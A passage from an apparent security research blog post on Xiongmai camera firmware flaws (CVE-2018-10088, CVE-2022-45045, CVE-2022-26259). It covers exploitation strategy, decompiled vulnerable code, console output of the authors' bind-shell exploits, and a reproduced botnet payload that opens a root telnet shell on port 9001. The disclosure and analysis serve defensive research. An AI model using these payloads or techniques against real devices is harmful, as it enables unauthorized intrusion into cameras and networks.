9",[1373,116418,4680],{"class":1383},[1373,116420,116421,116423,116425,116427,116429,116431,116433,116435,116437,116439],{"class":1375,"line":1266},[1373,116422,116376],{"class":4640},[1373,116424,5417],{"class":1397},[1373,116426,116381],{"class":7297},[1373,116428,1384],{"class":1383},[1373,116430,445],{"class":5467},[1373,116432,5437],{"class":1383},[1373,116434,183],{"class":1387},[1373,116436,7218],{"class":1391},[1373,116438,183],{"class":1387},[1373,116440,4680],{"class":1383},[1373,116442,116443,116445,116447,116449,116452,116454,116456,116458,116460],{"class":1375,"line":1852},[1373,116444,116400],{"class":7297},[1373,116446,1384],{"class":1383},[1373,116448,7218],{"class":1397},[1373,116450,116451],{"class":19096},"global_password",[1373,116453,5437],{"class":1383},[1373,116455,116376],{"class":4640},[1373,116457,15448],{"class":1397},[1373,116459,116416],{"class":5467},[1373,116461,4680],{"class":1383},[1373,116463,116464,116467,116469,116472],{"class":1375,"line":4692},[1373,116465,116466],{"class":4640},"DAT_00a3c4d8 ",[1373,116468,5417],{"class":1397},[1373,116470,116471],{"class":4640}," DAT_00a3c4e4",[1373,116473,4912],{"class":1383},[1373,116475,116476,116478,116480,116483,116485,116487,116490,116492,116494,116496,116498,116500],{"class":1375,"line":4724},[1373,116477,4637],{"class":4636},[1373,116479,4641],{"class":1383},[1373,116481,116482],{"class":4640},"DAT_009806f8 ",[1373,116484,15677],{"class":1397},[1373,116486,4641],{"class":1383},[1373,116488,116489],{"class":4640},"code ",[1373,116491,35613],{"class":1397},[1373,116493,2230],{"class":1383},[1373,116495,95840],{"class":5387},[1373,116497,445],{"class":5467},[1373,116499,2230],{"class":1383},[1373,116501,4765],{"class":1383},[1373,116503,116504,116507,116509,116511,116513,116516,116519,116521,116523,116525,116527,116529,116531,116534,116536,116539],{"class":1375,"line":4756},[1373,116505,116506],{"class":63570}," DAT_00a3c4a8 ",[1373,116508,5417],{"class":1397},[1373,116510,4641],{"class":1383},[1373,116512,35613],{"class":1397},[1373,116514,116515],{"class":63570},"DAT_009806f8",[1373,116517,116518],{"class":1383},")(",[1373,116520,445],{"class":5467},[1373,116522,5437],{"class":1383},[1373,116524,7218],{"class":1397},[1373,116526,116407],{"class":63570},[1373,116528,5437],{"class":1383},[1373,116530,95840],{"class":5387},[1373,116532,116533],{"class":5467},"2c",[1373,116535,5437],{"class":1383},[1373,116537,116538],{"class":63570},"DAT_00a3c504",[1373,116540,4680],{"class":1383},[1373,116542,116543],{"class":1375,"line":4768},[1373,116544,1855],{"class":1383},[1373,116546,116547,116549,116551,116554,116556,116558,116560],{"class":1375,"line":4792},[1373,116548,4637],{"class":4636},[1373,116550,4641],{"class":1383},[1373,116552,116553],{"class":4640},"DAT_00a3c4a8 ",[1373,116555,15920],{"class":1397},[1373,116557,5557],{"class":5467},[1373,116559,2230],{"class":1383},[1373,116561,4765],{"class":1383},[1373,116563,116564,116567,116569,116572,116574,116576,116579,116581,116583,116585,116588,116590,116592,116594,116597,116599],{"class":1375,"line":4798},[1373,116565,116566],{"class":7297}," sprintf",[1373,116568,1384],{"class":1383},[1373,116570,116571],{"class":63570},"local_140",[1373,116573,5437],{"class":1383},[1373,116575,183],{"class":1387},[1373,116577,116578],{"class":37971},"%s%s",[1373,116580,183],{"class":1387},[1373,116582,5437],{"class":1383},[1373,116584,183],{"class":1387},[1373,116586,116587],{"class":1391},"\u002Fmnt",[1373,116589,183],{"class":1387},[1373,116591,5437],{"class":1383},[1373,116593,183],{"class":1387},[1373,116595,116596],{"class":1391},"\u002FDVR",[1373,116598,183],{"class":1387},[1373,116600,4680],{"class":1383},[1373,116602,116603,116606,116608,116611,116613,116615,116617,116619],{"class":1375,"line":4806},[1373,116604,116605],{"class":7297}," FUN_004193dc",[1373,116607,1384],{"class":1383},[1373,116609,116610],{"class":63570},"param_1",[1373,116612,5437],{"class":1383},[1373,116614,116571],{"class":63570},[1373,116616,5437],{"class":1383},[1373,116618,445],{"class":5467},[1373,116620,4680],{"class":1383},[1373,116622,116623,116625,116627],{"class":1375,"line":4817},[1373,116624,7340],{"class":4636},[1373,116626,5557],{"class":5467},[1373,116628,4912],{"class":1383},[1373,116630,116631],{"class":1375,"line":4825},[1373,116632,1855],{"class":1383},[1373,116634,116635,116637,116639,116641,116643,116645,116647,116649,116651,116653,116655,116657,116659,116661,116664,116666],{"class":1375,"line":4835},[1373,116636,39226],{"class":7297},[1373,116638,1384],{"class":1383},[1373,116640,116571],{"class":4640},[1373,116642,5437],{"class":1383},[1373,116644,183],{"class":1387},[1373,116646,116578],{"class":37971},[1373,116648,183],{"class":1387},[1373,116650,5437],{"class":1383},[1373,116652,183],{"class":1387},[1373,116654,116587],{"class":1391},[1373,116656,183],{"class":1387},[1373,116658,5437],{"class":1383},[1373,116660,183],{"class":1387},[1373,116662,116663],{"class":1391},"\u002Ffailed.htm",[1373,116665,183],{"class":1387},[1373,116667,4680],{"class":1383},[18,116669,116670,116671,116674],{},"An overly long username (or password) will eventually gain control over ",[886,116672,116673],{},"pc"," by overwriting a function pointer. Unfortunately for the attacker, they don’t really have control over any of the other registers. Additionally, since the stack and heap bases are randomized, you can’t easily stash shellcode there without some type of address leak. Guessing addresses is no good either because if the system crashes you’ll have to wait 2 minutes for it to reboot. Not exactly ideal.",[18,116676,116677,116678,116681,116682,116687,116688,116692,116693,116696],{},"For ",[47,116679,81785],{"href":115748,"rel":116680},[51],", a similar Xiongmai HTTP buffer overflow vulnerability, ",[47,116683,116686],{"href":116684,"rel":116685},"https:\u002F\u002Fgithub.com\u002Ftothi",[51],"tothi"," wrote an ",[47,116689,22852],{"href":116690,"rel":116691},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Fblob\u002F42d8325e68fdb075fe27df8a269932f9fa9601a6\u002Fpwn_hisilicon_dvr.py#L266",[51]," that tried to solve this problem by leveraging CVE-2017-7577 to download Sofia’s ",[886,116694,116695],{},"\u002Fproc\u002Fpid\u002Fmaps"," to acquire the stack base address and then guessing for the offset of shellcode.",[18,116698,116699],{},"We took a different approach. CVE-2018-10088 overflows a global buffer that resides at a predictable address within Sofia’ data segment. Code execution can be achieved by writing shellcode to the overflowed password buffer, followed by overwriting the function pointer with the password buffer’s predictable address. When Sofia uses the overwritten function pointer, it’ll jump into the password buffer and execute our shellcode. The space is kind of tight (especially since Thumb isn’t supported on all devices), but doable.",[18,116701,116702],{},"Excluding a few overly technical issues, the only challenges with exploitation are dealing with the instruction cache (which we’re able to work around easily), and knowing what the password buffer’s address is across different versions. Of course, like tothi, we can solve the password buffer address issue by downloading Sofia from the target using CVE-2017-7577. Or we can just guess all known addresses. Waiting two minutes for a reboot isn’t too bad, right?",[18,116704,116705],{},"Here’s sample output from our exploit:",[1354,116707,116710],{"className":116708,"code":116709,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2018-10088$ .\u002Fbuild\u002Fcve-2018-10088-linux_arm64 -v -c -e -rhost 10.12.70.210 -bport 1270\n[+] Validating the remote target is a Xiongmai NVR\u002FIPC installation\n[+] Target validation succeeded!\n[+] Running a version check on the remote target\n[!] The target *might* be a vulnerable version. Continuing.\n[+] Sending a bind shell for port 1270\n[+] Using CVE-2017-7577 to download Sofia to fingerprint the version...\n[+] Using Sofia hash fc65ed752bd2efb8b57c638aae0960e0\n[+] Seeding the remote target with the exploit shell code\n[+] Triggering payload!\n[+] Connected to 10.12.70.210:1270!\n\nBusyBox v1.16.1 (2016-03-31 20:15:25 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n$ cat \u002Fproc\u002Fversion\ncat \u002Fproc\u002Fversion\nLinux version 3.0.8 (leixinyuan@localhost.localdomain) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016\n$\n",[886,116711,116709],{"__ignoreMap":219},[18,116713,116714,116715,116718,116719,116721,116722,116724,116725,116730],{},"Despite public reports, I somewhat doubt CVE-2018-10088 has been used in the wild. I think CVE-2018-10088 has gotten confused with tothi’s ",[886,116716,116717],{},"pwn_hisilicon_dvr.py",". The two vulnerabilities are not the same. CVE-2018-10088 is an overflow when ",[886,116720,116400],{}," uses a long username or password during a login attempt. Tothi’s vulnerability is an overflow when ",[886,116723,39226],{}," uses an overly long request URI. CVE-2018-10088 has no public RCE exploit, and tothi’s exploit was published with an ",[47,116726,116729],{"href":116727,"rel":116728},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Ftree\u002F42d8325e68fdb075fe27df8a269932f9fa9601a6",[51],"extensive writeup",". It seems more likely that botnet operators, instead of doing their own exploit development work, adapted tothi’s exploit. The confusion, I believe, lies in the fact that tothi’s vulnerability never had an assigned CVE (and the poor description of CVE-2018-10088). In an attempt to clarify that tothi’s vulnerability is not CVE-2018-10088, we asked MITRE to assign tothi’s vulnerability a CVE and they assigned CVE-2022-45460.",[18,116732,116733,116734,1246,116739,1246,116744,1255,116749,59],{},"We also got MITRE to assign CVE-2022-45045. This vulnerability is an arbitrary operating system command execution vulnerability on the port 34567 interface. In November 2022, we caught the vulnerability being exploited in our honeypots. We’ve seen the issue exploited by ",[47,116735,116738],{"href":116736,"rel":116737},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F85.31.44.178",[51],"85.31.44.178",[47,116740,116743],{"href":116741,"rel":116742},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F92.118.39.78",[51],"92.118.39.78",[47,116745,116748],{"href":116746,"rel":116747},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F193.47.61.60",[51],"193.47.61.60",[47,116750,116753],{"href":116751,"rel":116752},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F195.154.36.148",[51],"195.154.36.148",[18,116755,116756],{},[68,116757],{":width":10862,"alt":116758,"src":116759},"honeypot_pcap","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fhoneypot_pcap.png",[18,116761,116762,116763,982,116767,116772],{},"Other security vendors have reported seeing the same exploit in ",[47,116764,116766],{"href":106224,"rel":116765},[51],"2019",[47,116768,116771],{"href":116769,"rel":116770},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fmalware-hosting-domain-cyberium-fanning-out-mirai-variants",[51],"2021",". In fact, the payload embedded in the Wireshark screenshot above (from our honeypot) is exactly the same as the version Netlab 360 described in 2019. Here it is decompressed:",[1354,116774,116777],{"className":116775,"code":116776,"language":1359},[1357],"{\n \"UpgradeCommand\": [\n {\n \"Command\": \"Shell\",\n \"Script\": \"telnetd -p 9001 -l \u002Fbin\u002Fsh\"\n },\n {\n \"Command\": \"Shell\",\n \"Script\": \"busybox telnetd -p 9001 -l \u002Fbin\u002Fsh\"\n },\n {\n \"Command\": \"Shell\",\n \"Script\": \"sleep 259200\"\n },\n {\n \"Command\": \"Shell\",\n \"Script\": \"busybox sleep 259200\"\n }\n ],\n \"Hardware\": \"SkipCheck\",\n \"SupportFlashType\": [\n {\n \"FlashID\": \"SkipCheck\"\n }\n ],\n \"DevID\": \"SkipCheck\",\n \"Vendor\": \"SkipCheck\",\n \"CompatibleVersion\": -1,\n \"CRC\": \"SkipCheck\"\n}\n",[886,116778,116776],{"__ignoreMap":219},[18,116780,116781,116782,116784],{},"Each of the commands will be executed during an “upgrade”, although no upgrade filesystems are actually provided. The exploit opens ",[886,116783,1055],{}," on port 9001 which allows the attacker to begin a stage 2. Additionally, the exploit issues sleep commands to prevent the system from rebooting after the “upgrade” is finished. The sleep commands have the added benefit of locking down port 34567 and preventing any other attacker from exploiting the device as long as the sleep is active.",[18,116786,116787,116788,116792],{},"CVE-2022-45045 is exploited using a custom protocol on port 34567. An attacker must be authenticated to successfully execute the “upgrade” command. However, authentication is often not difficult because Xiongmai devices use default credentials (admin:) or the credentials can be leaked using CVE-2017-7577. A surprising amount of devices remain vulnerable to CVE-2017-7577 and, although they don’t have a tag for it, we can see on ",[47,116789,86601],{"href":116790,"rel":116791},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22%2F..%2F..%2F..%2F..%2F..%2Fmnt%2Fmtd%2FConfig%2FAccount1%22",[51]," that attackers are actively looking to leak credentials from these devices.",[18,116794,116795],{},"CVE-2022-45045 is particularly interesting because, as we saw in an earlier section, this interface has been available from 2016 through current firmware versions. But it’s difficult to get an estimate on potentially affected internet-facing devices because neither Censys or Shodan appear to identify the port. Perhaps because it requires a custom protocol. Without running our own internet scanner, it’s difficult to say how many affected internet facing systems there are. I would guess there are a fair amount, but that remains a guess.",[18,116797,116798,116799,59],{},"Xiongmai did make changes to the upgrade logic to prevent this specific attack sometime in 2020. Besides requiring the filesystem files to be present and adding a (poorly enforced) digital signature, they also started ignoring commands containing ",[886,116800,1055],{},[1354,116802,116804],{"className":92494,"code":116803,"language":28578,"meta":219,"style":219},"json_obj_Value(uVar4,\"Script\");\npcVar7 = (char *)json_value_as_string();\npcVar7 = strstr(pcVar7,\"telnetd\");\nif (pcVar7 == (char *)0x0) {\n uVar4 = FUN_00517e88(uVar3,uVar22);\n uVar4 = json_obj_Value(uVar4,\"Script\");\n json_asString(auStack6252,uVar4);\n uVar12 = local_1868;\n std::__cxx11::basic_string\u003Cchar,std::char_traits\u003Cchar>,std::allocator\u003Cchar>>::_M_dispose();\n if (uVar12 \u003C 100) {\n uVar4 = FUN_00517e88(uVar3,uVar22);\n json_obj_Value(uVar4,\"Script\");\n pcVar7 = (char *)json_value_as_string();\n system(pcVar7);\n }\n",[886,116805,116806,116827,116848,116872,116898,116920,116943,116959,116971,117007,117024,117043,117062,117081,117092],{"__ignoreMap":219},[1373,116807,116808,116811,116813,116816,116818,116820,116823,116825],{"class":1375,"line":1376},[1373,116809,116810],{"class":7297},"json_obj_Value",[1373,116812,1384],{"class":1383},[1373,116814,116815],{"class":4640},"uVar4",[1373,116817,5437],{"class":1383},[1373,116819,183],{"class":1387},[1373,116821,116822],{"class":1391},"Script",[1373,116824,183],{"class":1387},[1373,116826,4680],{"class":1383},[1373,116828,116829,116832,116834,116836,116839,116841,116843,116846],{"class":1375,"line":220},[1373,116830,116831],{"class":4640},"pcVar7 ",[1373,116833,5417],{"class":1397},[1373,116835,4641],{"class":1383},[1373,116837,116838],{"class":7293},"char",[1373,116840,19113],{"class":1397},[1373,116842,2230],{"class":1383},[1373,116844,116845],{"class":7297},"json_value_as_string",[1373,116847,15603],{"class":1383},[1373,116849,116850,116852,116854,116857,116859,116862,116864,116866,116868,116870],{"class":1375,"line":1266},[1373,116851,116831],{"class":4640},[1373,116853,5417],{"class":1397},[1373,116855,116856],{"class":7297}," strstr",[1373,116858,1384],{"class":1383},[1373,116860,116861],{"class":4640},"pcVar7",[1373,116863,5437],{"class":1383},[1373,116865,183],{"class":1387},[1373,116867,1055],{"class":1391},[1373,116869,183],{"class":1387},[1373,116871,4680],{"class":1383},[1373,116873,116874,116876,116878,116880,116882,116884,116886,116888,116890,116892,116894,116896],{"class":1375,"line":1852},[1373,116875,4637],{"class":4636},[1373,116877,4641],{"class":1383},[1373,116879,116831],{"class":4640},[1373,116881,15920],{"class":1397},[1373,116883,4641],{"class":1383},[1373,116885,116838],{"class":7293},[1373,116887,19113],{"class":1397},[1373,116889,2230],{"class":1383},[1373,116891,95840],{"class":5387},[1373,116893,445],{"class":5467},[1373,116895,2230],{"class":1383},[1373,116897,4765],{"class":1383},[1373,116899,116900,116903,116905,116908,116910,116913,116915,116918],{"class":1375,"line":4692},[1373,116901,116902],{"class":63570}," uVar4 ",[1373,116904,5417],{"class":1397},[1373,116906,116907],{"class":7297}," FUN_00517e88",[1373,116909,1384],{"class":1383},[1373,116911,116912],{"class":63570},"uVar3",[1373,116914,5437],{"class":1383},[1373,116916,116917],{"class":63570},"uVar22",[1373,116919,4680],{"class":1383},[1373,116921,116922,116924,116926,116929,116931,116933,116935,116937,116939,116941],{"class":1375,"line":4724},[1373,116923,116902],{"class":63570},[1373,116925,5417],{"class":1397},[1373,116927,116928],{"class":7297}," json_obj_Value",[1373,116930,1384],{"class":1383},[1373,116932,116815],{"class":63570},[1373,116934,5437],{"class":1383},[1373,116936,183],{"class":1387},[1373,116938,116822],{"class":1391},[1373,116940,183],{"class":1387},[1373,116942,4680],{"class":1383},[1373,116944,116945,116948,116950,116953,116955,116957],{"class":1375,"line":4756},[1373,116946,116947],{"class":7297}," json_asString",[1373,116949,1384],{"class":1383},[1373,116951,116952],{"class":63570},"auStack6252",[1373,116954,5437],{"class":1383},[1373,116956,116815],{"class":63570},[1373,116958,4680],{"class":1383},[1373,116960,116961,116964,116966,116969],{"class":1375,"line":4768},[1373,116962,116963],{"class":63570}," uVar12 ",[1373,116965,5417],{"class":1397},[1373,116967,116968],{"class":63570}," local_1868",[1373,116970,4912],{"class":1383},[1373,116972,116973,116976,116978,116980,116982,116985,116987,116989,116991,116993,116996,116998,117000,117002,117005],{"class":1375,"line":4792},[1373,116974,116975],{"class":63570}," std::__cxx11::basic_string",[1373,116977,11852],{"class":1397},[1373,116979,116838],{"class":7293},[1373,116981,5437],{"class":1383},[1373,116983,116984],{"class":63570},"std::char_traits",[1373,116986,11852],{"class":1397},[1373,116988,116838],{"class":7293},[1373,116990,5384],{"class":1397},[1373,116992,5437],{"class":1383},[1373,116994,116995],{"class":63570},"std::allocator",[1373,116997,11852],{"class":1397},[1373,116999,116838],{"class":7293},[1373,117001,15038],{"class":1397},[1373,117003,117004],{"class":7297},"::_M_dispose",[1373,117006,15603],{"class":1383},[1373,117008,117009,117011,117013,117016,117018,117020,117022],{"class":1375,"line":4798},[1373,117010,4695],{"class":4636},[1373,117012,4641],{"class":1383},[1373,117014,117015],{"class":63570},"uVar12 ",[1373,117017,11852],{"class":1397},[1373,117019,52027],{"class":5467},[1373,117021,2230],{"class":1383},[1373,117023,4765],{"class":1383},[1373,117025,117026,117029,117031,117033,117035,117037,117039,117041],{"class":1375,"line":4806},[1373,117027,117028],{"class":63570}," uVar4 ",[1373,117030,5417],{"class":1397},[1373,117032,116907],{"class":7297},[1373,117034,1384],{"class":1383},[1373,117036,116912],{"class":63570},[1373,117038,5437],{"class":1383},[1373,117040,116917],{"class":63570},[1373,117042,4680],{"class":1383},[1373,117044,117045,117048,117050,117052,117054,117056,117058,117060],{"class":1375,"line":4817},[1373,117046,117047],{"class":7297}," json_obj_Value",[1373,117049,1384],{"class":1383},[1373,117051,116815],{"class":63570},[1373,117053,5437],{"class":1383},[1373,117055,183],{"class":1387},[1373,117057,116822],{"class":1391},[1373,117059,183],{"class":1387},[1373,117061,4680],{"class":1383},[1373,117063,117064,117067,117069,117071,117073,117075,117077,117079],{"class":1375,"line":4825},[1373,117065,117066],{"class":63570}," pcVar7 ",[1373,117068,5417],{"class":1397},[1373,117070,4641],{"class":1383},[1373,117072,116838],{"class":7293},[1373,117074,19113],{"class":1397},[1373,117076,2230],{"class":1383},[1373,117078,116845],{"class":7297},[1373,117080,15603],{"class":1383},[1373,117082,117083,117086,117088,117090],{"class":1375,"line":4835},[1373,117084,117085],{"class":7297}," system",[1373,117087,1384],{"class":1383},[1373,117089,116861],{"class":63570},[1373,117091,4680],{"class":1383},[1373,117093,117094],{"class":1375,"line":4843},[1373,117095,4795],{"class":1383},[18,117097,117098],{},"While this issue is mitigated in newer versions of Xiongmai firmware, there remain a lot of affected devices on the internet, which is somewhat surprising given years of exploitation by at least one botnet (Moobot). Of course, newer firmware isn’t entirely immune to exploitation either.",[61,117100,117102],{"id":117101},"cve-2022-26259-rtsp-exploitation","CVE-2022-26259: RTSP Exploitation",[18,117104,117105,117106,117109,117110,117114],{},"CVE-2022-26259 is a newer Xiongmai vulnerability that was found by Chris Leech. The vulnerability details were ",[47,117107,22232],{"href":81975,"rel":117108},[51]," in early 2022. The vulnerability is a stack-based buffer overflow affecting RTSP parsing on port 554. VulnCheck has successfully exploited this vulnerability for RCE on all of our Xiongmai test devices. Xiongmai issued a ",[47,117111,20035],{"href":117112,"rel":117113},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php\u002Fservice\u002Fnotice_info\u002F51\u002F2",[51]," for this issue, but, curiously, the Sunba we purchased from Amazon isn’t listed as an affected device and doesn’t have a fix in the most up-to-date firmware despite being very exploitable.",[18,117116,117117],{},"Xiongmai devices have a fairly distinct RTSP banner, so we can see there are more than 100,000 of these endpoints on the internet.",[18,117119,117120],{},[68,117121],{":width":10862,"alt":117122,"src":117123},"rtsp_shodan","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Frtsp_shodan.png",[18,117125,117126,117127,22771,117130,117133,117134,117136],{},"The restrictions on the overflow payload are typical albeit somewhat strict. No null bytes. No space characters. Leech found the perfect ROP gadget in his test firmware. The gadget rotated an attacker-provided string on the stack from ",[886,117128,117129],{},"r9",[886,117131,117132],{},"r0","and then called ",[886,117135,99953],{},". Unfortunately, this primitive doesn’t exist in all firmware versions. Older firmware that don’t have this gadget can easily execute out of global buffers as discussed in the CVE-2018-10088 section. But newer firmware prevents data execution, so without Leech’s gadget being present, things get a little tough.",[18,117138,117139,117140,22771,117142,117144,117145,117147],{},"Not to say there is no solution. For example, our new Sunba using V4.03R11.C6380202 doesn’t have the ",[886,117141,117129],{},[886,117143,117132],{}," primitive, but it does have the following debug code that will pop open ",[886,117146,1055],{},". The debug function takes no parameters, so all we have to do is jump there.",[1354,117149,117151],{"className":92494,"code":117150,"language":28578,"meta":219,"style":219},"undefined4 UndefinedFunction_003f187c(void)\n{\n FILE *__stream;\n int *piVar1;\n char *pcVar2;\n undefined4 uVar3;\n\n memcpy(&stack0x0000000c,\"telnetd\",8);\n sprintf(&stack0x00000018,\"%s %X\",&stack0x0000000c);\n __stream = popen(&stack0x00000018,\"r\");\n if (__stream == (FILE *)0x0) {\n piVar1 = __errno_location();\n pcVar2 = strerror(*piVar1);\n printf(\"\\x1b[34mDebug R: Open Failed: %s!\\n\\x1b[0m\",pcVar2);\n uVar3 = 0xffffffff;\n }\n else {\n pclose(__stream);\n FUN_003f1588();\n uVar3 = 0;\n }\n return uVar3;\n}\n",[886,117152,117153,117168,117172,117184,117196,117208,117215,117219,117245,117275,117301,117329,117341,117359,117392,117407,117411,117417,117428,117435,117445,117449,117458],{"__ignoreMap":219},[1373,117154,117155,117158,117161,117163,117166],{"class":1375,"line":1376},[1373,117156,117157],{"class":4640},"undefined4 ",[1373,117159,117160],{"class":7297},"UndefinedFunction_003f187c",[1373,117162,1384],{"class":1383},[1373,117164,117165],{"class":7293},"void",[1373,117167,11875],{"class":1383},[1373,117169,117170],{"class":1375,"line":220},[1373,117171,8904],{"class":1383},[1373,117173,117174,117177,117179,117182],{"class":1375,"line":1266},[1373,117175,117176],{"class":63570}," FILE ",[1373,117178,35613],{"class":1397},[1373,117180,117181],{"class":63570},"__stream",[1373,117183,4912],{"class":1383},[1373,117185,117186,117189,117191,117194],{"class":1375,"line":1852},[1373,117187,117188],{"class":7293}," int",[1373,117190,19113],{"class":1397},[1373,117192,117193],{"class":63570},"piVar1",[1373,117195,4912],{"class":1383},[1373,117197,117198,117201,117203,117206],{"class":1375,"line":4692},[1373,117199,117200],{"class":7293}," char",[1373,117202,19113],{"class":1397},[1373,117204,117205],{"class":63570},"pcVar2",[1373,117207,4912],{"class":1383},[1373,117209,117210,117213],{"class":1375,"line":4724},[1373,117211,117212],{"class":63570}," undefined4 uVar3",[1373,117214,4912],{"class":1383},[1373,117216,117217],{"class":1375,"line":4756},[1373,117218,6520],{"emptyLinePlaceholder":237},[1373,117220,117221,117224,117226,117228,117231,117233,117235,117237,117239,117241,117243],{"class":1375,"line":4768},[1373,117222,117223],{"class":7297}," memcpy",[1373,117225,1384],{"class":1383},[1373,117227,7218],{"class":1397},[1373,117229,117230],{"class":63570},"stack0x0000000c",[1373,117232,5437],{"class":1383},[1373,117234,183],{"class":1387},[1373,117236,1055],{"class":1391},[1373,117238,183],{"class":1387},[1373,117240,5437],{"class":1383},[1373,117242,37681],{"class":5467},[1373,117244,4680],{"class":1383},[1373,117246,117247,117249,117251,117253,117256,117258,117260,117262,117265,117267,117269,117271,117273],{"class":1375,"line":4792},[1373,117248,116566],{"class":7297},[1373,117250,1384],{"class":1383},[1373,117252,7218],{"class":1397},[1373,117254,117255],{"class":63570},"stack0x00000018",[1373,117257,5437],{"class":1383},[1373,117259,183],{"class":1387},[1373,117261,38048],{"class":37971},[1373,117263,117264],{"class":37971}," %X",[1373,117266,183],{"class":1387},[1373,117268,5437],{"class":1383},[1373,117270,7218],{"class":1397},[1373,117272,117230],{"class":63570},[1373,117274,4680],{"class":1383},[1373,117276,117277,117280,117282,117285,117287,117289,117291,117293,117295,117297,117299],{"class":1375,"line":4798},[1373,117278,117279],{"class":63570}," __stream ",[1373,117281,5417],{"class":1397},[1373,117283,117284],{"class":7297}," popen",[1373,117286,1384],{"class":1383},[1373,117288,7218],{"class":1397},[1373,117290,117255],{"class":63570},[1373,117292,5437],{"class":1383},[1373,117294,183],{"class":1387},[1373,117296,11872],{"class":1391},[1373,117298,183],{"class":1387},[1373,117300,4680],{"class":1383},[1373,117302,117303,117305,117307,117310,117312,117314,117317,117319,117321,117323,117325,117327],{"class":1375,"line":4806},[1373,117304,4695],{"class":4636},[1373,117306,4641],{"class":1383},[1373,117308,117309],{"class":63570},"__stream ",[1373,117311,15920],{"class":1397},[1373,117313,4641],{"class":1383},[1373,117315,117316],{"class":63570},"FILE ",[1373,117318,35613],{"class":1397},[1373,117320,2230],{"class":1383},[1373,117322,95840],{"class":5387},[1373,117324,445],{"class":5467},[1373,117326,2230],{"class":1383},[1373,117328,4765],{"class":1383},[1373,117330,117331,117334,117336,117339],{"class":1375,"line":4817},[1373,117332,117333],{"class":63570}," piVar1 ",[1373,117335,5417],{"class":1397},[1373,117337,117338],{"class":7297}," __errno_location",[1373,117340,15603],{"class":1383},[1373,117342,117343,117346,117348,117351,117353,117355,117357],{"class":1375,"line":4825},[1373,117344,117345],{"class":63570}," pcVar2 ",[1373,117347,5417],{"class":1397},[1373,117349,117350],{"class":7297}," strerror",[1373,117352,1384],{"class":1383},[1373,117354,35613],{"class":1397},[1373,117356,117193],{"class":63570},[1373,117358,4680],{"class":1383},[1373,117360,117361,117364,117366,117368,117371,117374,117376,117378,117381,117384,117386,117388,117390],{"class":1375,"line":4835},[1373,117362,117363],{"class":7297}," printf",[1373,117365,1384],{"class":1383},[1373,117367,183],{"class":1387},[1373,117369,117370],{"class":2326},"\\x1b",[1373,117372,117373],{"class":1391},"[34mDebug R: Open Failed: ",[1373,117375,38048],{"class":37971},[1373,117377,16090],{"class":1391},[1373,117379,117380],{"class":2326},"\\n\\x1b",[1373,117382,117383],{"class":1391},"[0m",[1373,117385,183],{"class":1387},[1373,117387,5437],{"class":1383},[1373,117389,117205],{"class":63570},[1373,117391,4680],{"class":1383},[1373,117393,117394,117397,117399,117402,117405],{"class":1375,"line":4843},[1373,117395,117396],{"class":63570}," uVar3 ",[1373,117398,5417],{"class":1397},[1373,117400,117401],{"class":5387}," 0x",[1373,117403,117404],{"class":5467},"ffffffff",[1373,117406,4912],{"class":1383},[1373,117408,117409],{"class":1375,"line":4849},[1373,117410,4795],{"class":1383},[1373,117412,117413,117415],{"class":1375,"line":4877},[1373,117414,7643],{"class":4636},[1373,117416,4765],{"class":1383},[1373,117418,117419,117422,117424,117426],{"class":1375,"line":4915},[1373,117420,117421],{"class":7297}," pclose",[1373,117423,1384],{"class":1383},[1373,117425,117181],{"class":63570},[1373,117427,4680],{"class":1383},[1373,117429,117430,117433],{"class":1375,"line":4931},[1373,117431,117432],{"class":7297}," FUN_003f1588",[1373,117434,15603],{"class":1383},[1373,117436,117437,117439,117441,117443],{"class":1375,"line":4947},[1373,117438,117396],{"class":63570},[1373,117440,5417],{"class":1397},[1373,117442,5557],{"class":5467},[1373,117444,4912],{"class":1383},[1373,117446,117447],{"class":1375,"line":4952},[1373,117448,4795],{"class":1383},[1373,117450,117451,117453,117456],{"class":1375,"line":6776},[1373,117452,7340],{"class":4636},[1373,117454,117455],{"class":63570}," uVar3",[1373,117457,4912],{"class":1383},[1373,117459,117460],{"class":1375,"line":6781},[1373,117461,1855],{"class":1383},[18,117463,117464,117465,117468,117469,117471,117472,117474,117475,117477,117478,117480,117481,117483],{},"This function actually shows another Xiongmai curiosity. See the weird ",[886,117466,117467],{},"%X"," after ",[886,117470,1055],{}," in the ",[886,117473,39226],{}," call? This is to accommodate an alteration this firmware version has in busybox. The updated busybox will check for a special value on the command line when ",[886,117476,1055],{}," is invoked. If the correct value isn’t present then ",[886,117479,1055],{}," won’t start. Presumably, this is an attempt by Xiongmai to stop the ",[886,117482,1055],{},"-based attacks that have plagued their devices. Fortunately for us, this function (which is very poorly decompiled by Ghidra) will calculate the value for us.",[18,117485,117486],{},"Here is the output for a proof of concept we wrote that opens telnet using this function.",[1354,117488,117491],{"className":117489,"code":117490,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ telnet 10.12.70.218\nTrying 10.12.70.218...\ntelnet: Unable to connect to remote host: Connection refused\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ .\u002Fbuild\u002Fcve-2022-26259-linux_arm64 -e -rhost 10.12.70.218\n[+] Sending a bind shell for port 23\n[+] Connecting to 10.12.70.218:554\n[+] Connected to 10.12.70.218:23!\n[+] Done!\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ telnet 10.12.70.218\nTrying 10.12.70.218...\nConnected to 10.12.70.218.\nEscape character is '^]'.\nLogin incorrect\nLocalHost 